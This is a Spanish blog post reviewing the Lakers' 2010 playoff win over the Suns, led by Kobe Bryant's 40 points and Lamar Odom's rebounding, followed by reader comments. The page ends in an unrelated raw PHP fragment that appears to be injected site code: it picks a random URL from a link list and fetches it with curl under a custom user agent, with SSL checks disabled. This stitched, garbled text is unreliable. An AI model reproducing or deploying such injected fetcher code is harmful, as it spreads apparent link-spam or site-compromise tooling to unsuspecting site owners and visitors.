Playoffs 17/05/2010: Kobe Doin’ Work

18 de May de 2010 por TheDeerHunter

kobedoinworkCuando el panorama es éste no queda otra que quitarse el sombrero y aplaudir. Por momentos, en un tercer cuarto memorable, era Kobe contra los Phoenix Suns al completo. El #24 decidió que era el momento de vengar viejas afrentas, y lo hizo como mejor sabe. Anotó de todas las maneras posibles, levantó el público de sus asientos y dejó a los Suns completamente k.o.

Hay días que el monotema puede llegar a aburrir. En otros, sin embargo, cuando cada acción individual alcanza cotas artísticas que acercan lo increíble a lo corriente no queda otra sino asumirlo y disfrutarlo, por mucho que nos cueste digerir que esto no siempre pertenece al ámbito de lo colectivo. Por otro lado cuesta imaginar otro baloncesto más sublime y más perfecto en lo individual.

Kobe es el primero pero no es el único fuego que deberán apagar los Suns. De entrada es difícil pensar que tendrán remotas opciones si no lo atan mínimamente en corto, porque la Mamba estando tan cómodo te va a destrozar seguro. Si hubiera hecho falta más anoche, habríamos visto más. Se fue al banquillo cuando todavía restaban 9 minutos y había masacrado a los Suns con 40 puntos. Desde luego que no funcionó la defensa de Hill, ni la de Dudley, ni el intento de zona, ni nada. Gentry tiene trabajo por delante al respecto pero parece evidente que para próximas ocasiones tendrá que ordenar ayudas defensivas sobre Bryant.

shannonjrich

Otro aspecto es la superioridad interior de Lakers. Con Bynum muy renqueante y Gasol bastante relajado con respecto a sus obligaciones más oscuras los amarillos se comieron con patatas a los pívots de los Suns. Anoche tocaba uno de esos partidos en los que Odom despierta de su habitual letargo y causa un roto de magnitudes siderales. Si el bueno de Lamar fuera un jugador normal deberíamos haber analizado lo difícilmente detectable que podría resultar para un juego interior de la configuración del de los Suns. En realidad cuesta encontrar en la plantilla algún nombre que pueda contestar la versatilidad de Odom y anoche el jugón neoyorkino lo aprovechó a las mil maravillas. Llegan estas fechas y suele ser cuando le suena el despertador. El que siga siendo así podría traducirse en título para su equipo. Para eso todavía queda mucho por demostrar.

Por parte de los Suns, el problema no fue tanto lo que hicieron como lo que dejaron hacer. Ofensivamente estuvieron correctos, incluso bien, salvo por el pobre 5 de 22 en triples. La vuelta de Robin López les da un plus de consistencia y recursos. Sin llegar a brillar, Stoudemire, Nash, Richardson, Barbosa y Dragic vieron aro con cierta fluidez. Fallaron estrepitosamente Frye y Dudley, pero no parece que hubieran podido cambiar mucho el panorama cuando los Lakers estuvieron todo el partido rondando el 60% en tiros de campo y un 50% en triples. Cuando este equipo se puede permitir el lujo de anotar así es invencible.

PREMIOS

MVP: Nos contaban en la previa que Kobe no había podido entrenarse desde que acabó la serie contra los Jazz y que le habían tenido que extraer líquido de la rodilla. Pues menos mal, porque Bryant despedazó a los Suns con 40 puntos, 5 rebotes y 5 asistencias en 35 minutos de juego en un aviso de lo que espera a Phoenix si Gentry mantiene su política anti 2 contra 1.

kblo

La sorpresa: Ya habíamos visto a Odom ofrecer buenos minutos en estos Playoffs, aunque le faltaba un partido tan completo como el de anoche, con 17 puntos en la primera mitad y un absoluto dominio del rebote. LO sumó 19 capturas, más que los cuatro interiores de los Suns (Stoudemire, Frye, Admuson y Lopez). Por parte visitante, la sorpresa agradable la puso Robin Lopez, que en su regreso tras la lesión añadió a su habitual garra un notable acierto ofensivo (6 de 7 en tiros, 14 puntos).

La decepción: Sabemos que la defensa no es el fuerte de Amaré Stoudemire, pero al menos podría disimular. Se quedó en tres tristes rebotes y asistió a la exhibición anotadora y reboteadora de Odom como un espectador más. Eso sí, al menos anotó con cierta consistencia, algo que no puede decir un Channing Frye que se limitó a tirar (y fallar) triples.

El mayor esfuerzo en vano: No fue el Nash deslumbrante de otras ocasiones, e incluso encontró problemas para superar a Fisher, pero aun así el canadiense se fue a 13 puntos y 13 asistencias.

Y MAÑANA:

A las 2.30 horas de la próxima madrugada los Magic tratarán de equilibrar las Finales del Este tras el triunfo de los Celtics en el asalto inicial. Toda la presión, para Dwight Howard & Co.

Comenta

10 comentarios a esta entrada

  1. sergio dice:
    #1

    Apuntabamos a que el ritmo alto, la velocidad, y un número alto de puntos podrían beneficiar a los Suns pero, en un partido en el que se han dado las 3 cosas, al final han sido los Lakers los que se han llevado el gato al agua. Hay muchas formas de correr y tener un ritmo alto. Los Lakers pueden hacerlo, aparte de en los contragolpes, con el magnifico juego interior entre sus pivots, dando asistencias en el poste y haciendo lo que podríamos denominar como “paredes” (permitidme el simil futbolístico). A pesar de que, como apuntó Gasol al final del partido, los Suns intentan facilitar el tiro exterior para que el partido se convierta en una competición de triples (especialmente si el que tira es Artest), los angelinos siguen metiendo balones a los pívots y concentrándose en asegurar los tableros.

    Este año me han gustado especialmente los Lakers en la capacidad de adaptación a cualquier sistema rival, ganando partidos “marrulleros” a pocos puntos, y otros por encima de los 120.

    Si Kobe sigue a este nivel no se que equipo podría ganarles… Aunque también está claro que los Suns no son la mejor defensa del campeonato (por sistema de juego y efectivos)

      Citar

  2. Vader dice:
    #2

    Esto tiene pinta de segundo anillo para Lakers…

      Citar

  3. kantonyo dice:
    #3

    Viendo la facilidad con la que está ganando Lakers a Phoenix, con la facilidad con la que ganó a Utah, y a su vez con la facilidad con la que Phoenix y Utah se deshicieron de San Antonio y Denver. Me pregunto:

    De verdad hay tanta diferencia entre los Lakers y todos los equipos del OESTE???

    Son tan buenos estos Lakers??

    La verdad que hay pocos jugadores tan preparados para unos playoffs en este momento como BRYANT-GASOL-ODOM y por otra parte ALLEN-PIERCE-GARNETT

      Citar

  4. wherenbahappens dice:
    #4

    Fantástico post! Al nivel de Kobe esta madrugada en lo que a blogs se refiere.
    Muchas felicidades.
    http://wherenbahappens.wordpress.com/

      Citar

  5. sergio dice:
    #5

    Habeis leido la noticia de que la eliminación de los Cavs puede ser debida a motivos psicológicos por parte de LeBron?? Resulta que es probable que su madre y Delonte West estén saliendo juntos??

      Citar

  6. Love Denise dice:
    #6

    jajajjajajja meto, meto, meto, saco, saco jjajjajajjaja, en caso de ser verdad, a este Delonte se le va la olla.

    Voy a ver a los lakers que lo tengo grabado

      Citar

  7. sergi237 dice:
    #7

    ¿Delonte West se esta zumbando a la marde le LeBron?

      Citar

  8. Vader dice:
    #8

    Si esto fuera de verdad la clave del tema seria… ¿Un posible hijo seria tan bueno como Lebron o estaria tan loco como Delonte? Jajaja

      Citar

  9. MagicJohnson32 dice:
    #9

    ¿Cómo puede Stoudemire ser tan ridículo como para decir que Odom tuvo suerte en el primer partido?

      Citar

  10. sergi237 dice:
    #10

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>